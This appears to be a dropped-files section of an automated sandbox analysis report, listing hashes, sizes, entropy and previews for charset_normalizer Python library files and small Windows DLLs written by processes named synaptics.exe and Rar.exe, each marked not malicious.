                                                                                                                                                                                                                                  SHA-256:DF5614503CC721BFE7BD3B6C7DBAE963DB2CCD1593420A9B2F7E18C869C71BA9
                                                                                                                                                                                                                                  SHA-512:F63209DB3AEF7C5FF713ED6EE832B4F10A796D7AD53D58EE7FB2E962F4B270077206AD6B7D058A32210B88D7AF2AD7C1C6066655F82A16816DE314BDCA5A43FE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......>..f........................@...s~...U.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...e.g.d...d.e.e.g.e.e.g.d...Z.e.e.e.e.e.e...f...f...e.d.<.d.Z.e.e.d.<.e.d...Z.e.e.d.<.d.Z.e.e.d.<.i.d.e.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d e.d.d!....d"e.d!d#....d$e.d#d%....d&e.d%d'....d(e.d'd)....d*e.d)d+....d,e.d+d-....d.e.d-d/....i.d0e.d/d1....d2e.d1d3....d4e.d3d5....d6e.d5d7....d8e.d7d9....d:e.d9d;....d<e.d;d=....d>e.d=d?....d@e.d?dA....dBe.dAdC....dDe.dCdE....dFe.dEdG....dHe.dGdI....dJe.dIdK....dLe.dKdM....dNe.dMdO....dPe.dOdQ......i.dRe.dQdS....dTe.dSdU....dVe.dUdW....dXe.dWdY....dZe.dYd[....d\e.d[d]....d^e.d]d_....d`e.d_da....dbe.dadc....dde.dcde....dfe.dedg....dhe.dgdi....dje.didk....dle.dkdm....dne.dmdo....dpe.dodq....dre.dqds......i.dte.dsdu....dve.dudw....dxe.dwdy....dze.dyd{....d|e.d{d}....d~e.d}d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d.....d.e.d.d...
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1832
                                                                                                                                                                                                                                  Entropy (8bit):5.510476363041549
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:owwE8mcebSh3Ue75yubxeNOhsV4the+NK29:owAmcebSyo5yc4NFV4Pe+Nn
                                                                                                                                                                                                                                  MD5:141224151438D92BD26939D9027DFCF2
                                                                                                                                                                                                                                  SHA1:CC4439C184DB58955B1FDD984B4743EF5EDE6203
                                                                                                                                                                                                                                  SHA-256:E0222F540B50E3CBE4802C8E5D6E07F507024E888EBD82686BA016C7ED6C32E1
                                                                                                                                                                                                                                  SHA-512:6DC9F3563DE83D9F9D79FA19FDE127CAED32C41E829CC6218BAAF442ABCD4C6E547984250324922798F84B62545C2FC97E57D117EEB5E65BCB9F9299EFCC360F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......>..fM........................@...sr...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....d.d.e.d.e.d.e.d.e.e.e.e.e.e.f.....f...f.d.d...Z.d.S.)......)...Any..Dict..Optional..Union)...warn.....)...from_bytes)...CHARDET_CORRESPONDENCEF..byte_str..should_rename_legacy..kwargs..returnc....................K...s....t.|...r.t.d.d...t.|...........d.......t.|.t.t.f...s#t.d...t.|.........t.|.t...r,t.|...}.t.|.......}.|.d.u.r9|.j.n.d.}.|.d.u.rG|.j.d.k.rG|.j.n.d.}.|.d.u.rRd.|.j...n.d.}.|.d.u.rc|.d.k.rc|.j.rc|.d.7.}.|.d.u.ro|.t.v.rot.|...}.|.|.|.d...S.).aJ.... chardet legacy method. Detect the encoding of the given byte string. It should be mostly backward-compatible.. Encoding name will match Chardet own writing whenever possible. (Not on encoding name unsupported by it). This function is deprecated and should be used to migrate your project easily, consult the documentation for. further information. Not planned for removal... :param byte_str: The byte seque
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11527
                                                                                                                                                                                                                                  Entropy (8bit):5.173759325973184
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:N3Ou/wM2HQVZI3mkrM0Af4/W7QeyRhhpermRK+pQCBdjWdIq:NeuYM2HQVZIjrdAf4eSvhpeKc+iCHWdD
                                                                                                                                                                                                                                  MD5:C9AC7B038F5571B937D6A16B4314FB13
                                                                                                                                                                                                                                  SHA1:3F3AE4A46B718DA6FE44A3734AF8C3AA3BEAB5F4
                                                                                                                                                                                                                                  SHA-256:9BBDC4E189BF0C955FA9BE8FB9D51A8495306E3FEB3011954DC41653D7A53DBD
                                                                                                                                                                                                                                  SHA-512:5E1A5CFC5F9EF325DF19E6E49758C67A5BD52B2208327A881220DE44774F7885F8B3CDDE5F0377B1823829794C9E6AF551A4A327FCB772B327FDA3FABE01B80E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......>..f.........................@...s....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...G.d.d...d...Z.G.d.d...d...Z.e.e.e.f...Z.e.e...Z.G.d.d...d...Z.d.S.)......)...aliases)...sha256)...dumps)...Any..Dict..Iterator..List..Optional..Tuple..Union.....)...TOO_BIG_SEQUENCE)...iana_name..is_multi_byte_encoding..unicode_rangec....................@...s....e.Z.d.Z...d=d.e.d.e.d.e.d.e.d.d.d.e.e...f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.e.d.e.f.d.d.....Z.d.e.f.d.d...Z.d.e.f.d.d...Z.d>d.d...Z.e.d.e.f.d.d.....Z.e.d.e.e...f.d.d.....Z.e.d.e.f.d.d.....Z.e.d.e.f.d.d ....Z.e.d.e.e...f.d!d"....Z.e.d.e.f.d#d$....Z.e.d.e.f.d%d&....Z.e.d.e.f.d'd(....Z.e.d.e.f.d)d*....Z.e.d.e.f.d+d,....Z.e.d.e.f.d-d.....Z.e.d.e.d...f.d/d0....Z.e.d.e.f.d1d2....Z.e.d.e.e...f.d3d4....Z.e.d.e.e...f.d5d6....Z d?d8e.d.e.f.d9d:..Z!e.d.e.f.d;d<....Z"d.S.)@..CharsetMatchN..payload..guessed_encoding..mean_mess_ratio..has_sig_or_bom..languages..CoherenceMatches..decod
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8908
                                                                                                                                                                                                                                  Entropy (8bit):5.4660542464474515
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:k8kSSE/TPTRTa5Tl1T+T8IunXU92ZQF4lYuoFaFEj:5SkrBalFA8ImE8y6rFo
                                                                                                                                                                                                                                  MD5:DB153734CCA2E197E2FA342A1AA837FB
                                                                                                                                                                                                                                  SHA1:3737E311C94D779DAE3A92B21E6A995417E28DCF
                                                                                                                                                                                                                                  SHA-256:1EC349B471312CDD14B52C703E73AD03AD05DE00670541FE0A62F68F1A6C47EE
                                                                                                                                                                                                                                  SHA-512:7CC8A44672E2FEEA29EE3337CED00B7EBB0D81A24D03044CD9934635EE4300411EFDFBA42498BA35B5F36FC1889835E6357C506663ED898B68D0813440FF37AE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......>..f.0.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.e.d...d.e.d.e.f.d.d.....Z.e.e.d...d.e.d.e.f.d.d.....Z.e.e.d...d.e.d.e.e...f.d.d.....Z.e.e.d...d.e.d.e.f.d.d.....Z e.e.d...d.e.d.e.f.d.d.....Z!e.e.d...d.e.d.e.f.d.d.....Z"e.e.d...d.e.d.e.f.d.d.....Z#e.e.d...d.e.d.e.f.d.d.....Z$e.e.d...d.e.d.e.f.d.d.....Z%e.e.d...d.e.d.e.f.d.d ....Z&e.e.d...d.e.d.e.f.d!d"....Z'e.e.d...d.e.d.e.f.d#d$....Z(e.e.d...d.e.d.e.f.d%d&....Z)e.e.d...d.e.d.e.f.d'd(....Z*e.e.d...d.e.d.e.f.d)d*....Z+e.e.d...d.e.d.e.f.d+d,....Z,e.e-e...d...d-e.d.e.f.d.d/....Z.e.e.d...d.e.d.e.f.d0d1....Z/d_d3e0d4e1d.e.e...f.d5d6..Z2e.d7d...d8e.d.e.f.d9d:....Z3d3e0d.e.e.e...e0f...f.d;d<..Z4d=e.d.e.f.d>d?..Z5d`dAe.dBe.d.e.f.dCdD..Z6dEe.d.e.e...f.dFdG..Z7dHe.dIe.d.e8f.dJdK..Z9dHe.dIe.d.e.f.dLdM..Z:dNe.j;dOf.d8e.dPe1dQe.d.d.f.dRdS..Z<..dadTe0dUe.dVe=dWe1dXe.dYe.dZe0d[e.d\e.e...d.e.e.d.d.f...f.d]d^
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):252
                                                                                                                                                                                                                                  Entropy (8bit):5.312246123551203
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:y/BGt/z/Oszurb64b7+uaHKdArsQx6G3D8Isi:CQ/z/OsJa/hQ8GT8Iv
                                                                                                                                                                                                                                  MD5:763EBE05301CFA08EE5E8AA24F64CE04
                                                                                                                                                                                                                                  SHA1:39A3116BDFA7F417B800CDAA0E59E7143175D0E3
                                                                                                                                                                                                                                  SHA-256:DC9B7F717B98AD5AED301701B046240D02E6540B130CB45BD77CE74F3E8E5FA0
                                                                                                                                                                                                                                  SHA-512:9600AAC9595DF1441A1317D4EA2A6E646AA242A1138C69AD1BDD6DAEA1516D1A6D239E8D9461ADCF85C9D46F03C51CE6A98C280F686732D392DD3BA75FE51A20
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......>..fU........................@...s....d.Z.d.Z.e...d...Z.d.S.).z..Expose version.z.3.3.2...N)...__doc__..__version__..split..VERSION..r....r.....JC:\Users\Public\M20EKMMEH2\lib\site-packages\charset_normalizer\version.py..<module>....s..........
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):21723
                                                                                                                                                                                                                                  Entropy (8bit):4.344893314336944
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:p2x1hvkZ+5NKZOptbYe5pNjxaC6FeMLMNIo7g7ZSKF:Ax1hcZ+5N/pJPpNjn6FeNb7cZSKF
                                                                                                                                                                                                                                  MD5:3DCEEAA50D7F4FECF99A18787955C802
                                                                                                                                                                                                                                  SHA1:298156169704CF6F1E34722625D029AA0A4D3F24
                                                                                                                                                                                                                                  SHA-256:A852F47EB52B71F718109986A6AA09E007FAF13A15B9EDDFE522B5829F140B94
                                                                                                                                                                                                                                  SHA-512:AC1F37A7BDD8E7DBFBE6F4F242D30E2D8F72F80B1708D69360C841BDB756B7BCAFEBB4DED5BF24EC1AA3FBD85370F6BA63D7CAB5C42B9B12AAAFB91B06596C83
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import logging..from os import PathLike..from typing import BinaryIO, List, Optional, Set, Union....from .cd import (.. coherence_ratio,.. encoding_languages,.. mb_encoding_languages,.. merge_coherence_ratios,..)..from .constant import IANA_SUPPORTED, TOO_BIG_SEQUENCE, TOO_SMALL_SEQUENCE, TRACE..from .md import mess_ratio..from .models import CharsetMatch, CharsetMatches..from .utils import (.. any_specified_encoding,.. cut_sequence_chunks,.. iana_name,.. identify_sig_or_bom,.. is_cp_similar,.. is_multi_byte_encoding,.. should_strip_sig_or_bom,..)....# Will most likely be controversial..# logging.addLevelName(TRACE, "TRACE")..logger = logging.getLogger("charset_normalizer")..explain_handler = logging.StreamHandler()..explain_handler.setFormatter(.. logging.Formatter("%(asctime)s | %(levelname)s | %(message)s")..)......def from_bytes(.. sequences: Union[bytes, bytearray],.. steps: int = 5,.. chunk_size: int = 512,.. threshold: float = 0.2,
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12955
                                                                                                                                                                                                                                  Entropy (8bit):4.565085883136704
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:auWIiX1vR2Yf2bb6WjCKJdnZsisOQ07Tzfh+3gnfmus+rt5E/t7RV:ayiXF+Pp7Tzfh+wnfmufrt5E/t7RV
                                                                                                                                                                                                                                  MD5:743B974C6FFEB35D433C276B344A1140
                                                                                                                                                                                                                                  SHA1:F1CA137C1BA5049C0AB7661DE0E66F4C51F03DD8
                                                                                                                                                                                                                                  SHA-256:61F937B1B79ED17AA8D7EBE64186CEA8CE75F926A35CF2F31551BCF674EC6737
                                                                                                                                                                                                                                  SHA-512:26497E2EFA6761838067810097FE8B355AB5E838C3DBA908EA0240B158CB47B13717942B32F15A9AE8B3EBAFE2029412B9A777C7485F91A48A03D1892EBACE64
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import importlib..from codecs import IncrementalDecoder..from collections import Counter..from functools import lru_cache..from typing import Counter as TypeCounter, Dict, List, Optional, Tuple....from .constant import (.. FREQUENCIES,.. KO_NAMES,.. LANGUAGE_SUPPORTED_COUNT,.. TOO_SMALL_SEQUENCE,.. ZH_NAMES,..)..from .md import is_suspiciously_successive_range..from .models import CoherenceMatches..from .utils import (.. is_accentuated,.. is_latin,.. is_multi_byte_encoding,.. is_unicode_range_secondary,.. unicode_range,..)......def encoding_unicode_range(iana_name: str) -> List[str]:.. """.. Return associated unicode ranges in a single byte code page... """.. if is_multi_byte_encoding(iana_name):.. raise IOError("Function not supported on multi-byte code page").... decoder = importlib.import_module(.. "encodings.{}".format(iana_name).. ).IncrementalDecoder.... p: IncrementalDecoder = decoder(errors="ignore").. seen_ran
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):106
                                                                                                                                                                                                                                  Entropy (8bit):4.336412994117974
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:1L6jZKXRYF0AaUFvLzaqDFoNW/kJM7RActNL4op:1Lu0BgounD6WsJM7ZtZ4op
                                                                                                                                                                                                                                  MD5:FAC8FDA8B9C67E4FE079EB2B712EA666
                                                                                                                                                                                                                                  SHA1:DCA37B0BF798ABC6801A97100549400939882371
                                                                                                                                                                                                                                  SHA-256:08EC0FF1F2B6A9BBA574C7A6DA52FCD4989E63E3C80361B6199E487403CC3C50
                                                                                                                                                                                                                                  SHA-512:01EBCBA22F54C86A9C4B7093523C1729917E097C29F626F6940AA71AA39622AE5D8DFB2272AF0ED64976795477B3ED1E881EA2FB9B17612664E60C28AC454DEA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from .__main__ import cli_detect, query_yes_no....__all__ = (.. "cli_detect",.. "query_yes_no",..)..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10040
                                                                                                                                                                                                                                  Entropy (8bit):4.016136127999308
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:ZVqYUPQuTDuX0gWP7EkjzetFJltUlHHiThp:ZVqYUP5DD7EG+FJltUlcH
                                                                                                                                                                                                                                  MD5:736969E9EFF624D9D34708313644E6F6
                                                                                                                                                                                                                                  SHA1:A69D7BF335809168C95DE7818DE592F2E47AC996
                                                                                                                                                                                                                                  SHA-256:AECF9C062A41CEBEDDD1301A51AD271B8AAB8D785D75D782541F9FE97B7FC12D
                                                                                                                                                                                                                                  SHA-512:91A2E0F161502AE170A0E1708C02C5968D06A1B27E401D021A5D4F55D04B9A6F12E4BAF563290B95699151D10DC58ADD3732AFA40A0554E730139911EB46A8F2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import argparse..import sys..from json import dumps..from os.path import abspath, basename, dirname, join, realpath..from platform import python_version..from typing import List, Optional..from unicodedata import unidata_version....import charset_normalizer.md as md_module..from charset_normalizer import from_fp..from charset_normalizer.models import CliDetectionResult..from charset_normalizer.version import __version__......def query_yes_no(question: str, default: str = "yes") -> bool:.. """Ask a yes/no question via input() and return their answer..... "question" is a string that is presented to the user... "default" is the presumed answer if the user just hits <Enter>... It must be "yes" (the default), "no" or None (meaning.. an answer is required of the user)..... The "answer" return value is True for "yes" or False for "no"..... Credit goes to (c) https://stackoverflow.com/questions/3041986/apt-command-line-interface-like-yes-no-input.. """.. vali
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):42476
                                                                                                                                                                                                                                  Entropy (8bit):4.506500945749441
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:wpR63vF6I6dA1qmi8ER7GapnRw89g/4u/A7pLP8A8vnmsFIGFz:463vH6dAUmiPY5uI
                                                                                                                                                                                                                                  MD5:4C832423BA35785DCC80B0DDBD9207E0
                                                                                                                                                                                                                                  SHA1:552FF010E2EBFE3DA0E6F38310BBC47220CEB833
                                                                                                                                                                                                                                  SHA-256:DAD56B5D0F5CBC2F23B746FC819CD15EF5ED7B5A556D1ADAD00E5D3960D049AA
                                                                                                                                                                                                                                  SHA-512:E3DCF75CF381374E429FF131D156B01CD6ED32B77170B06EC9762CC97E074805E44003991CEBFF485061BDE89D865E8FC5D5EBECA569207AA2609E70260AE742
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..from codecs import BOM_UTF8, BOM_UTF16_BE, BOM_UTF16_LE, BOM_UTF32_BE, BOM_UTF32_LE..from encodings.aliases import aliases..from re import IGNORECASE, compile as re_compile..from typing import Dict, List, Set, Union....# Contain for each eligible encoding a list of/item bytes SIG/BOM..ENCODING_MARKS: Dict[str, Union[bytes, List[bytes]]] = {.. "utf_8": BOM_UTF8,.. "utf_7": [.. b"\x2b\x2f\x76\x38",.. b"\x2b\x2f\x76\x39",.. b"\x2b\x2f\x76\x2b",.. b"\x2b\x2f\x76\x2f",.. b"\x2b\x2f\x76\x38\x2d",.. ],.. "gb18030": b"\x84\x31\x95\x33",.. "utf_32": [BOM_UTF32_BE, BOM_UTF32_LE],.. "utf_16": [BOM_UTF16_BE, BOM_UTF16_LE],..}....TOO_SMALL_SEQUENCE: int = 32..TOO_BIG_SEQUENCE: int = int(10e6)....UTF8_MAXIMAL_ALLOCATION: int = 1_112_064....# Up-to-date Unicode ucd/15.0.0..UNICODE_RANGES_COMBINED: Dict[str, range] = {.. "Control character": range(32),.. "Basic Latin": range(32, 128),.. "Latin-1 Supplement": range(1
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2125
                                                                                                                                                                                                                                  Entropy (8bit):4.7244650981655125
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:/Y+Lw2ERLYA5yD3ShiUB757v/bKnCjRi6kRqzBQJB7riYeJ0rG6wTW:/Y+LfERLpyD3S/95773aWL0rG6wTW
                                                                                                                                                                                                                                  MD5:A5026121DAE2BAF5F556823179F94C2D
                                                                                                                                                                                                                                  SHA1:041A659F5E04949F0D66F192412F8EC7974BBEB3
                                                                                                                                                                                                                                  SHA-256:29B271129BBB83ACC4DAE5D20774FEDF5EFC72089241D549949998FA0BF71003
                                                                                                                                                                                                                                  SHA-512:D5A963006ABD8FE71B1C5A66F44603E2D4EC17E4F90D6E1A2A30C66DEC38D1D482BD2C713A1A3251E8A2652806A6315A2B23A69ED84E8CB11B743A75ADBCF948
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Any, Dict, Optional, Union..from warnings import warn....from .api import from_bytes..from .constant import CHARDET_CORRESPONDENCE......def detect(.. byte_str: bytes, should_rename_legacy: bool = False, **kwargs: Any..) -> Dict[str, Optional[Union[str, float]]]:.. """.. chardet legacy method.. Detect the encoding of the given byte string. It should be mostly backward-compatible... Encoding name will match Chardet own writing whenever possible. (Not on encoding name unsupported by it).. This function is deprecated and should be used to migrate your project easily, consult the documentation for.. further information. Not planned for removal..... :param byte_str: The byte sequence to examine... :param should_rename_legacy: Should we rename legacy encodings.. to their more modern equivalents?.. """.. if len(kwargs):.. warn(.. f"charset-normalizer disregard arguments '{','.join(list(k
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8704
                                                                                                                                                                                                                                  Entropy (8bit):5.122487232944936
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:YflUp1oDPmhFgodhRSKcC5WJ1ks/vnnZjOwCF1oMmGffQzQkT16:6lu1oDPm57SKPWJzvZjOOMVnET4
                                                                                                                                                                                                                                  MD5:492FC2C3D9E5D652C8D6EE1A0E3F9E94
                                                                                                                                                                                                                                  SHA1:40C8EA35116D23EF992B0633795258A1ED044A35
                                                                                                                                                                                                                                  SHA-256:F1EF1EBEDA3306B95ACA52F89C49DD9943768C274AC2DB8E4A6A1B303952C106
                                                                                                                                                                                                                                  SHA-512:B1B78F6F9323FFF9D83F8ED682FCB48A30DEE5C95B1178C6C567C99CA5BD9BC2C19CD067BDC74A84F387A08FA649F7F7C4FB71D05A529FBE29D3A98B2271E1FF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................Y......................................'..............................5...........Rich...........PE..L....hAe...........!...%..................... ...............................`............@.........................@%..l....%..d....@.......................P..T....!...............................!..@............ ..x............................text............................... ..`.rdata.. .... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..T....P....... ..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20239
                                                                                                                                                                                                                                  Entropy (8bit):4.462176748433946
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:X+NrqaBrMK0lzOXSSSI7IRmVf/L9t8/T/D/VnrgzfEz6zkzrD/UdBWgWHzW9k5G6:UrqaidOXkI7IRmV79PfKEqrlgWTTr
                                                                                                                                                                                                                                  MD5:D22F1E5694206C2089871189EE9CEFF6
                                                                                                                                                                                                                                  SHA1:D573C1456C0FBF637480436F2402550AC827DE20
                                                                                                                                                                                                                                  SHA-256:17B4B4D3535D3E0900A266B6C39F7C21DC767255BD9635E544860A6502AC0900
                                                                                                                                                                                                                                  SHA-512:6B6D277E614E82549B8E3389E6D657490CB7B367A5F4D7BF73681827008FCF491909915362F387AD62950515C8560C20D00AEBB71E33A4A96643C027D1096D33
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from functools import lru_cache..from logging import getLogger..from typing import List, Optional....from .constant import (.. COMMON_SAFE_ASCII_CHARACTERS,.. TRACE,.. UNICODE_SECONDARY_RANGE_KEYWORD,..)..from .utils import (.. is_accentuated,.. is_arabic,.. is_arabic_isolated_form,.. is_case_variable,.. is_cjk,.. is_emoticon,.. is_hangul,.. is_hiragana,.. is_katakana,.. is_latin,.. is_punctuation,.. is_separator,.. is_symbol,.. is_thai,.. is_unprintable,.. remove_accent,.. unicode_range,..)......class MessDetectorPlugin:.. """.. Base abstract class used for mess detection plugins... All detectors MUST extend and implement given methods... """.... def eligible(self, character: str) -> bool:.. """.. Determine if given character should be fed in... """.. raise NotImplementedError # pragma: nocover.... def feed(self, character: str) -> None:.. """.. The main routine to
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):101376
                                                                                                                                                                                                                                  Entropy (8bit):6.4980262678085285
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:pZcxP+DzstYWMWl0h79jbBrVA+wP1IS+ODqmM7kCufB:rA+DwtYWMOi9vbAXIwDqmM7kCa
                                                                                                                                                                                                                                  MD5:B097E1BCB848F7E75F9E18D80037AA82
                                                                                                                                                                                                                                  SHA1:A461A995132548F2A7CD44311165DAF19512889C
                                                                                                                                                                                                                                  SHA-256:240074887EA15325E081D6291F019FF929639C5803D4562CF0134A235A376529
                                                                                                                                                                                                                                  SHA-512:50274BA7D7F5AA501275EC8AE24807D57A288BAFD380D2557021DB7855C7B87BCAF669B222740BBF240D1C1B907C378F6CEC8CBCFE2FB620A159509BB192B21D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u.8f1dV51dV51dV58..57dV5$.W43dV5z.W43dV5$.S4=dV5$.R4;dV5$.U43dV5..W42dV51dW5.dV5..^40dV5..V40dV5..50dV5..T40dV5Rich1dV5........................PE..L....hAe...........!...%............0........ ............................................@..........................T..`....T..x....................................P..............................0P..@............ ..@............................text............................... ..`.rdata..0C... ...D..................@..@.data.... ...p.......T..............@....rsrc................n..............@..@.reloc...............p..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11964
                                                                                                                                                                                                                                  Entropy (8bit):4.479965853888732
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:my01bEHbOSe118Desz7UZTM5ms3a0qWTpGrQ9uPCG/fbtk3:my01oHbOSe118DeEUMAs3a0qWTUrQ9VP
                                                                                                                                                                                                                                  MD5:175CE316FB854AC25E5130D7669C8FD4
                                                                                                                                                                                                                                  SHA1:DFC05FA794BFF41C49C4BB9F2BF57873573D843B
                                                                                                                                                                                                                                  SHA-256:0257A1BB218313BE2386BCA383A4D39188753029ED7F15C57C68538B47ACBBE6
                                                                                                                                                                                                                                  SHA-512:923497F99F8D2B3E969000C6F9F26B60EF69899FCA16159DABA5024CA0C1BC64430681BB86EE29E3D2650E09BEE4CCB1B416A96ED05DC83D1AE08FF3AF8B4485
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from encodings.aliases import aliases..from hashlib import sha256..from json import dumps..from typing import Any, Dict, Iterator, List, Optional, Tuple, Union....from .constant import TOO_BIG_SEQUENCE..from .utils import iana_name, is_multi_byte_encoding, unicode_range......class CharsetMatch:.. def __init__(.. self,.. payload: bytes,.. guessed_encoding: str,.. mean_mess_ratio: float,.. has_sig_or_bom: bool,.. languages: "CoherenceMatches",.. decoded_payload: Optional[str] = None,.. ):.. self._payload: bytes = payload.... self._encoding: str = guessed_encoding.. self._mean_mess_ratio: float = mean_mess_ratio.. self._languages: CoherenceMatches = languages.. self._has_sig_or_bom: bool = has_sig_or_bom.. self._unicode_ranges: Optional[List[str]] = None.... self._leaves: List[CharsetMatch] = [].. self._mean_coherence_ratio: float = 0.0.... self._output_payload: Optional[b
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12315
                                                                                                                                                                                                                                  Entropy (8bit):4.8657023319997865
                                                                                                                                                                                                                                  Encrypted:false
